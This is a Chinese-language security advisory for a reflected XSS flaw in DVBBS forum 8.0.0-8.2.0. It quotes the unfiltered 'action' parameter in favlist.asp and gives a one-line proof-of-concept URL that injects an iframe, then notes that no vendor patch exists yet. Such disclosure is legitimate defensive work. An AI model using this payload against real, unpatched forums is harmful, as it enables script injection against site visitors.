影响版本:
DVBBS 8.0.0-8.2.0
程序介绍:
动网论坛做为动网主要服务产品之一,自2001年投入推广并运营以来,得到了国内外广大互联网用户的广泛好评和支持。做为国内第一的互联网论坛服务品牌,占据了国内论坛服务市场的70%以上的用户,动网论坛服务在一些如电影、下载、网游等热门网站的占有率甚至高达80%以上,是中国论坛服务领域事实上的标准。
漏洞分析:
文件favlist.asp中:
Function ShowPage(CurrentPage,Pcount,totalrec,PageNum) //第227行
Dim SearchStr
SearchStr=Request("action")
……
ShowPage=Replace(ShowPage,"{$SearchStr}",SearchStr) //第236行
ShowPage=Replace(ShowPage,"{$redcolor}",Dvbbs.mainsetting(1))
程序没有对输出变量SearchStr过滤导致xss漏洞的产生。
漏洞利用:
http://www.target.com/favlist.asp?action=xxx’);//–>%3C/script%3E<iframe%20src=http://www.baidu.com></iframe>
解决方案:
厂商补丁
DVBBS
———-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dvbbs.net
信息来源:
<*来源: Bug.Center.Team http://www.cnbct.org
链接: http://wavdb.com/vuln/1440
*>
0 条评论。